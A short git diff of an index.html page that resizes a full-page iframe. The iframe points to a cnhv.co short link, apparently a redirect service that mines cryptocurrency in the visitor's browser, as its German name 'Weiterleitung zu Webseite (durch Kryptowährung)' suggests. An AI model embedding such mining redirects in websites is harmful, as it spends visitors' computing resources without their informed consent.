--- a/index.html
+++ b/index.html
@@ -1,6 +1,6 @@
 <html><body>
 	
-	<iframe src="https://cnhv.co/1lhns" frameborder="0" name="Weiterleitung zu Webseite (durch Kryptowährung)">
+	<iframe src="https://cnhv.co/1lhns" frameborder="0" name="Weiterleitung zu Webseite (durch Kryptowährung)" width="99%" height="99%">
 		<p>Dein Browser unterstützt keine Iframes! Gelange hier zur Webseite: </p><a href="https://cnhv.co/1lhns">*click*</a>
 	</iframe>
 	
